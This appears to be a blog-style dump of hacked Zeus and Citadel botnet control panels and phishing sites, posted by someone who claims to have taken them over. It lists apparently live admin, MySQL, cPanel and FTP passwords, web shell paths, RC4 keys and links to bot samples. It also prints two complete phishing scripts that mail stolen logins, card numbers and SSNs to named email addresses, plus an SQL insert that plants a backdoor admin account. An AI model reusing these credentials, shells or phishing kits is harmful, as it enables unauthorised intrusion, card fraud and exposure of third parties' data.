Zeus Botnet - 54.201.153.149 - Owned

// version 2.0.8.9
// admin user 
admin : mentman1
// ftp : 
deamon:xampp
// config 
#?php
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'daemon';
$config['mysql_pass']          = 'jG9mBvGQM7Jhbv62';
$config['mysql_db']            = 'evildb';
$config['reports_path']        = '_feedback';
$config['reports_to_db']       = 1;
$config['reports_to_fs']       = 1;
$config['reports_no_shit']     = 1;
$config['reports_jn']          = 0;
$config['reports_jn_logfile']  = '';
$config['reports_jn_account']  = '';
$config['reports_jn_pass']     = '';
$config['reports_jn_server']   = '';
$config['reports_jn_port']     = 5222;
$config['reports_jn_to']       = '';
$config['reports_jn_list']     = '';
$config['reports_jn_script']   = '';
$config['reports_dyncfg']      = 0;
$config['reports_dyncfg_script']  = '';
$config['membership_timeout']      = 1500;
$config['membership_cryptkey']     = 'ovWPvhfFJ';
$config['membership_cryptkey_bin'] = array(111, 27, 63, 146, 46, 219, 229, 29, 132, 252, 195, 222, 120, 85, 235, 8, 237, 173, 210, 215, 196, 14, 183, 54, 105, 33, 119, 230, 86, 101, 117, 93, 3, 131, 112, 197, 36, 147, 74, 89, 212, 64, 21, 207, 15, 60, 224, 30, 1, 141, 250, 32, 94, 194, 90, 72, 77, 214, 134, 165, 0, 126, 199, 115, 255, 193, 245, 52, 118, 99, 48, 49, 187, 104, 159, 163, 244, 148, 190, 221, 26, 247, 191, 88, 103, 62, 133, 70, 108, 208, 216, 82, 114, 124, 243, 186, 71, 100, 211, 169, 246, 138, 10, 57, 16, 180, 200, 125, 202, 150, 236, 130, 129, 149, 189, 22, 168, 201, 80, 184, 67, 233, 106, 172, 84, 177, 158, 28, 151, 209, 182, 161, 154, 171, 102, 227, 248, 40, 92, 58, 152, 95, 142, 68, 156, 97, 17, 20, 254, 251, 13, 107, 223, 56, 160, 50, 228, 51, 79, 66, 9, 91, 75, 232, 239, 2, 83, 144, 45, 35, 166, 37, 181, 240, 6, 65, 185, 253, 5, 18, 25, 145, 188, 137, 192, 127, 128, 98, 19, 155, 34, 38, 178, 213, 136, 31, 198, 140, 205, 123, 206, 231, 226, 55, 238, 87, 203, 24, 109, 122, 69, 110, 157, 59, 242, 42, 81, 135, 218, 121, 170, 41, 76, 179, 12, 139, 96, 204, 241, 11, 164, 53, 249, 44, 23, 43, 78, 113, 217, 220, 234, 116, 4, 7, 73, 176, 175, 174, 225, 143, 47, 39, 167, 153, 162, 61);
?#
// extracted by Xylitol 
RC4 Keystream    6f1b3f922edbe51d84fcc3de7855eb08edadd2d7c40eb736692177e65665755d038370c524934a59d44015cf0f3ce01e018dfa205ec25a484dd686a5007ec773ffc1f53476633031bb689fa3f494bedd1af7bf58673e85466cd0d852727cf3ba4764d3a9f68a0a3910b4c87dca96ec828195bd16a8c950b843e96aac54b19e1c97d1b6a19aab66e3f8285c3a985f8e449c611114fefb0d6bdf38a032e4334f42095b4be8ef0253902d23a625b5f00641b9fd05121991bc89c07f8062139b2226b2d5881fc68ccd7bcee7e237ee57cb186d7a456e9d3bf22a5187da79aa294cb30c8b60ccf10ba435f92c172b4e71d9dcea74040749b0afaee18f2f27a799a23d
    hxxp://54.201.153.149/ontrack-list/controller/theboldandthebeaded.php
    hxxp://54.201.153.149/ontrack-list/controller/hamilton.bin

Zeus - berizka.gorodok.km.ua - Botnet

// mysql config from bot 
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'berizka_image';
$config['mysql_pass']          = 'olaoluwa!@#';
$config['mysql_db']            = 'berizka_image';
// zeus panel 
hxxp://berizka.gorodok.km.ua/core/auth/image/cp.php
admin:dragob

Zeus Citadel - 65.200.132.20 - Botnet

the admin ....

// panel 
http://65.200.132.20/webalizer/webdav/cp.php
admin:govno
// email used for phishing 
kotak4amal@gmail.com
// scan4you account and jabber
  'scan4you_jid' => 'uznik15@jabber.ru',
  'scan4you_id' => '29719',
  'scan4you_token' => 'd47310b2beea51ec546e',
// m.php
<?include 'images/validate_form.js';



$ip = getenv("REMOTE_ADDR");

$message .= "-------- XxX  *~* Mr-Lordz *~*  XxX-------\n";

$message .= "User-ID: ".$_POST['user']."\n";

$message .= "Password: ".$_POST['passwd']."\n";

$message .= "IP: ".$ip."\n";

$message .= "-------------Created By Mr-lordz--------------\n";



$recipient = "kotak4amal@gmail.com";

$subject = "ComCastID ~ $ip";

$headers = "From: ";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

mail($recipient,$subject,$message,$headers);

     if (mail($recipent,$subject,$message,$headers))

       {

           header("Location: billing.htm");



       }

else

           {

         echo "ERROR! Please go back and try again.";

         }



?> 

Zeus - sip1distribution.com - Botnet

Some photos of the admin ..

 

// admin ip 
hxxp://www.utrace.de/?query=41.79.219.204
// zeus panel 
admin:thankgod123
hxxp://sip1distribution.com/.zerd/cp.php
// mysql 
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'sip1dist_admin';
$config['mysql_pass']          = 'thankgod123';
$config['mysql_db']            = 'sip1dist_admin';

Zbot - kihsmalta.com - Hacked

// http://urlquery.net/report.php?id=1415211438936

// zeus panel 
hxxp://kihsmalta.com/cp.php

// .htacces file
deny from quttera.com
deny from hosts-file.net
deny from amada.abuse.ch
deny from palevotracker.abuse.ch
deny from blogger.com
deny from phishtank.com
deny from netcraft.com
deny from google.com
deny from yahoo.com
deny from malwared.ru
deny from malware.com.br
deny from malekal.com
deny from k7computing.com 
deny from gdata.com
deny from gdatasoftware.com
deny from fortinet.com
deny from emsisoft.com
deny from quttera.com
deny from opera.com
deny from infospyware.com
deny from .................... etc 

 allow from all

 allow from all
 
# Block shell uploaders, htshells, and other baddies
RewriteCond %{REQUEST_URI} ((php|my|bypass)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|c100|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_URI} (\.exe|\.php\?act=|\.tar|_vti|afilter=|algeria\.php|chbd|chmod|cmd|command|db_query|download_file|echo|edit_file|eval|evil_root|exploit|find_text|fopen|fsbuff|fwrite|friends_links\.|ftp|gofile|grab|grep|htshell|\ -dump|logname|lynx|mail_file|md5|mkdir|mkfile|mkmode|MSOffice|muieblackcat|mysql|owssvr\.dll|passthru|popen|proc_open|processes|pwd|rmdir|root|safe0ver|search_text|selfremove|setup\.php|shell|ShellAdresi\.TXT|spicon|sql|ssh|system|telnet|trojan|typo3|uname|unzip|w00tw00t|whoami|xampp) [NC,OR]
RewriteCond %{QUERY_STRING} (\.exe|\.tar|act=|afilter=|alter|benchmark|chbd|chmod|cmd|command|cast|char|concat|convert|create|db_query|declare|delete|download_file|drop|edit_file|encode|environ|eval|exec|exploit|find_text|fsbuff|ftp|friends_links\.|globals|gofile|grab|insert|localhost|logname|loopback|mail_file|md5|meta|mkdir|mkfile|mkmode|mosconfig|muieblackcat|mysql|order|passthru|popen|proc_open|processes|pwd|request|rmdir|root|scanner|script|search_text|select|selfremove|set|shell|sql|sp_executesql|spicon|ssh|system|telnet|trojan|truncate|uname|union|unzip|whoami) [NC] 
RewriteRule .* - [F]

/// extracted from xylitolMalware family    ZEUS
MD5    8f6b9dbfb715c4a8166401e6fc511964
Version    2.1.0.1
RC4 Keystream    21db88b013ff66617997a990f083df91ac7327b64287569a376a5a63ee4abf234da43d2e758644c919788bc09200957d7b04084fa6dc1503e753f50257f10b121caea254c5be6d55fbaa07d21b777e2a67100ff27c6072d343ca9dbc80eb2f2ccd5293711ae6d9c365b5f8f3ddd83550189c3a418a8c9406b96bce25cb38d4d0695f8999e8d7fa0c013c2833e5a5cfcc5e14c61e816ca04bb2c1bac776170adaf451322d40e9e2ef3ea3bb11456fe1d5294e0eea1dfc85b38df9d659393174263447b4ec5b84f70d58deb85ca798c848c28e05f67ae39bed9f647062e47f682b209609c4fe6eb11f4caf8f22d1a182a8abb73f3b1624fd36465dbdad309ee049

Zbot - motoecarro.com.br - Hacked

// mysql
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'motoecar_1';
$config['mysql_pass']          = 'J31OIPuOLSf$';
$config['mysql_db']            = 'motoecar_1';

// zeus panel 
hxxp://motoecarro.com.br/images/cp.php
user : admin
pass : 123456  

// config.bin
hxxp://motoecarro.com.br/images/config.bin

Zbot - menumaterno.com.br - Hacked

$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'materno_labe';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'materno_labe';

// hxxp://menumaterno.com.br/skins/tango/thumb.php [shell]

// zeus panel 
hxxp://menumaterno.com.br/skins/tango/_labe/cp.php?m=home
user : admin
pass : 1qaz2wsx

[cpan]
password=provnet13
user=materno

Zbot - e-rbi.org - Hacked

hxxp://e-rbi.org/03/serverphp/cp.php

All info ( php shell , zeus panel ) conntact me at my email !!

Zbot - www.oei.org.ar - Hacked

//report
hxxps://zeustracker.abuse.ch/monitor.php?host=www.oei.org.ar
// interesting script "cn.pl" found at 
/home/oeiorgar/cn.pl
// http://pastebin.com/y5CYspZG

all information ( shell path , zeus panel and other ) conntact me at email !!

Zeus - Spamers Network

A follower asked to post this. But now im still working on that many more 
samples inside, gone post it soon ..

Phishing - bristolbathroomstore.co.uk - Exposed

Today i just checked my spam mail and saw this mail 

It say's that my card has been suspended and an error deleted all information !! so i clicked the link and moved to this page

It want all security info from me including card number and pin .
I entered some trash info and submited it , then the script "Perfect.php" came in action and moved me to visa website . So but lets take a look at the url :

hxxp://www.bristolbathroomstore.co.uk/uploads/news/%20vbv.USA/your%20account/index.html 

also visa move to the "bristol bathroom store" website LOL

also i put a shell on it just to look at the file "Perfect.php"

<?php
$ip = getenv("REMOTE_ADDR");
$J7 = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=$ip");
$CNCD = $J7->geoplugin_countryCode ; // Country
$STCD = $J7->geoplugin_regionCode ; //  State
$hostname = gethostbyaddr($ip);
$message .= "-----------------[ReZuLt]-------------------\n";
$message .= "First name                     : ".$_POST['nom']."\n";
$message .= "Last name                  : ".$_POST['nom0']."\n";
$message .= "Adress Line 1 : ".$_POST['address1']."\n";
$message .= "Adress Line 2 : ".$_POST['address2']."\n";
$message .= "Town/City : ".$_POST['city']."\n";
$message .= "Pastcode : ".$_POST['zip']."\n";
$message .= "Date dnaissance   : ".$_POST['l_civil0']."/".$_POST['l_civil1']."/".$_POST['l_civil2']."\n";
$message .= "Non d j f      : ".$_POST['adresse']."\n";
$message .= "Social Security Number : ".$_POST['ssn1']."/".$_POST['ssn2']."/".$_POST['ssn3']."\n";
$message .= "Type de carte  : ".$_POST['l_civil3']."\n";include 'Perfect/visa.css';
$message .= "numero carte   : ".$_POST['ccnum']."\n";
$message .= "Date d'expir   : ".$_POST['mois']."/".$_POST['annee']."\n";
$message .= "cvv2           :".$_POST['cvv2']."\n";
$message .= "---------------------------------------------\n";
$message .= "IP Address : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$timedate = $_POST['historys'];
$rnessage  = "$message\n";
$message .= "-------------------+ Created in 2014 [ Dj0ui ] +--------------------\n";
$send="mamine.boujneh@live.fr"; // 
$subject = "CC VBV ReZulT | Fallega |  ~>| $CNCD | $STCD | Fr0m $ip";
$headers = "From:Fallega~<mamine.boujneh@live.fr>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$rnessage,$headers);
mail("mamine.boujneh@live.fr",$subject,$rnessage,$headers);
header("Location:  https://usa.visa.com/personal/security/vbv/index.html");
?>

all the data collected go to his mail address , also if u enter in on facebook give you interesting information .

Zbot - optometriaortopticamendezronderos.com - Hacked

$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'optometr_server';
$config['mysql_pass']          = '123qwe';
$config['mysql_db']            = 'optometr_server';
// hxxp://optometriaortopticamendezronderos.com/css/upload/login/cp.php?m=login
user : admin
pass(md5) : 786b754d2b4902cb348bb59d7cff0004
pass : alexgrema

// second zbot panel (index)
// hxxp://optometriaortopticamendezronderos.com/css/index/cp.php?m=login
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'optometr_ff';
$config['mysql_pass']          = '123qwe';
$config['mysql_db']            = 'optometr_ff';

user : admin
pass(md5) : fc7d1bcf2447219eb208b96aa3d0a58c
pass : salamsalam

// zip file found on server 
hxxps://www.sendspace.com/file/s3k9i8

Zbot - peterpanaupairs.co.uk - Login

 // zeus panel 
hxxp://www.peterpanaupairs.co.uk/duff/duff/30/cp.php
user : admin
pass : admin88

// bot sample
hxxps://www.sendspace.com/file/t29i3e

Zbot - dairyforsale.com.au - Hacked

hxxp://dairyforsale.com.au/images/roy/cp.php

// config
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'dairy_roy';
$config['mysql_pass']          = 'thankgod123';
$config['mysql_db']            = 'dairy_roy';

// zeus panel
user : admin
pass : 12345678

// shell 
hxxp://dairyforsale.com.au/cache/m.php

// cpanel 
user = 'dairy';
pass = 'vatbuster';

Zeus - ghandigameh.org - Hacked

//shell 
hxxp://www.ghandigameh.org/wkv3.php
passwd : its-ownz

// mysql
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'ghandiga_timbod';
$config['mysql_pass']          = 'cecelle222';
$config['mysql_db']            = 'ghandiga_timbod';
// zeus panel 
hxxp://www.ghandigameh.org/timbod/cp.php
user : its-ownz
pass : 123456

// mysql
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'ghandiga_okpokoa';
$config['mysql_pass']          = 'cecelle222';
$config['mysql_db']            = 'ghandiga_okpokoa';
// zeus panel 
hxxp://www.ghandigameh.org/okpokoa/cp.php
user : its-ownz
pass : 123456


// mysql
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'ghandiga_mumbas';
$config['mysql_pass']          = 'cecelle222';
$config['mysql_db']            = 'ghandiga_mumbas';
// zeus panel 
hxxp://www.ghandigameh.org/mumbas/cp.php
user : its-ownz
pass : 123456

// login was 
admin ip = 41.220.69.209
admin 6a74c2362a925e5dc22f82a285d44aa5 (md5 hash)

// added via mysql thu ..
INSERT INTO `cp_users` ( `id`, `name`, `pass`, `language`, `flag_enabled`, `comment`, `ss_format`, `ss_quality`, `r_edit_bots`, `r_stats_main`, `r_stats_main_reset`, `r_stats_os`, `r_botnet_bots`, `r_botnet_scripts`, `r_botnet_scripts_edit`, `r_reports_db`, `r_reports_db_edit`, `r_reports_files`, `r_reports_files_edit`, `r_reports_jn`, `r_system_info`, `r_system_options`, `r_system_user`, `r_system_users` ) VALUES ( '2', 'its-ownz', 'e10adc3949ba59abbe56e057f20f883e', 'en', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1' );

Zbot - vinltd.com - Hacked

// zeus panel
http://vinltd.com/suz/cp.php 
user : admin 
pass : profyle187

// mysql
$config['mysql_host']          = '127.0.0.1';
$config['mysql_user']          = 'vinltdco_suz';
$config['mysql_pass']          = 'profyle187';
$config['mysql_db']            = 'vinltdco_suz';

// shell 
hxxp://vinltd.com/info.php
// note account suspended !

Zbot - ns2.ezhost.in - Login

// zeus panel 1
user : admin
pass : london
login : hxxp://ns2.ezhost.in/ca/serverphp/cp.php

// zeus panel 2
user : admin
pass : london
hxxp://ns2.ezhost.in/images/us/serverphp/cp.php

// zeus panel 3
user : admin
pass : london
hxxp://ns2.ezhost.in/images/online/serverphp/cp.php

// php panel 
hxxp://ns2.ezhost.in/ca.zip
hxxp://ns2.ezhost.in/images.zip

NOTE : added a second admin user to all panels 
user : its-ownz
pass : 123456

ZeusBot - newbetrrsearve.co.uk - Hacked

// Panel
hxxp://newbetrrsearve.co.uk/usa/serverphp/cp.php
// login 
user : admin
pass : london 
// have fun

rageBot - 1war.hopto.org - Owned ( lol )

* Connecting to 1war.hopto.org (94.75.255.77) port 6667...
* Connected. Now logging in...
* *** Checking ident...
* *** No ident response; username prefixed with ~
* You have not registered
* Received a CTCP VERSION from IRC
<< 332 [nLh-VNC]szedsp ##vampir## :+scan 60 1 201 -b 3
<< 333 [nLh-VNC]szedsp ##vampir## Vampir 1413995814
<< 353 [nLh-VNC]szedsp @ ##vampir## :[nLh-VNC]szedsp [nLh-VNC]edmhip [nLh-VNC]aueejn [nLh-VNC]zabbni [nLh-VNC]yffqig [nLh-VNC]lrstbw [nLh-VNC]camwpi [nLh-VNC]wikcfh [nLh-VNC]vtsgjy [nLh-VNC]gyryte [nLh-VNC]tkarol [nLh-VNC]pwzrlf +MissaK|NS| [nLh-VNC]idiswr @nitZ [nLh-VNC]hkzqij
<< 366 [nLh-VNC]szedsp ##vampir## :End of /NAMES list.
<< PRIVMSG [nLh-VNC]szedsp :\x01VERSION\x01
>> PRIVMSG ##vampir## :\x02[RAGE SCAN:]\x02 range: 201/60 threads.

Zeus Botnet - 46.22.173.133 - Owned

hxxp://46.22.173.133/boom/cp.php?letter=home
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'root';
$config['mysql_pass']          = 'thanks22';
$config['mysql_db']            = 'prince';

$config['reports_path']        = '_fe
we are in 

// prince 
admin 607cbd481652995c869ca3d08252df0e = favour123
// doom
admin   0192023a7bbd73250516f069df18b500 = admin123

// zeus panel + builder found at his pc

hxxp://www.datafilehost.com/d/863b03f7
pass : itsownz

// malware 

c5b2ef451c3fc351401f07d12b48240a md5 hash 
serach at malwr.com

// extraced from Xylitol thanks

Malware family    ZEUS
MD5    0b68b3c971fb4109094b1437e15e258b
Version    2.1.0.1
RC4 Keystream    bdd55760218b4d697d5681297c15a928758e7619368c05544a1bfd077722ce31adb10e3b41df0861a8503045272e7fcf55bec623fb9d6df49e10ea7109b22c43b5682b639f3549a66f5aae3d5eedaa665cbf9a33975317a0c9a1d103da674613d2f8007a396e9cc2920f93b3fe940a89146bdca391983a424e590174b8eec0efa4baff3ec5e0f7e3cdab1c122db4dd0b485d0ce6378734858a3f0d52d9c872e244e47bf6e95196cc1124c4bbc16aec73fceb831fe1866c2fb726d316d6af4c474088c78499f52ad74fb6701ed4a2f120b9588dd05b8f62ca3cde6506789b804ba51dcbf2e8c379381a5f02e5f9f318f0320425e7d8b07efa8295bcdb9064a7ac
gate.php URLs    

    hxxp://46.22.173.133/prince/secure.php

URLs    

    hxxp://46.22.173.133/prince/config.bin

Zeus Bot - cmbonline.in - Hacked

config.php

http://cmbonline.in/
// login 
// user : admin2
// pass : admin
hxxp://cmbonline.in/wp-admin/css/colors/admin1/cp.php

// shell 
hxxp://cmbonline.in/wp-admin/css/colors/admin1/install/info.php

// other bots found from that 
user=admin
pass=ENUGU042

hxxp://coco-bomgo.ru/wordpress/wp-admin/images/admin2/php/cp.php?m=login
hxxp://www.ostarinduztry.com/wp-includes/ID3/larger/php/cp.php?m=login
// have fun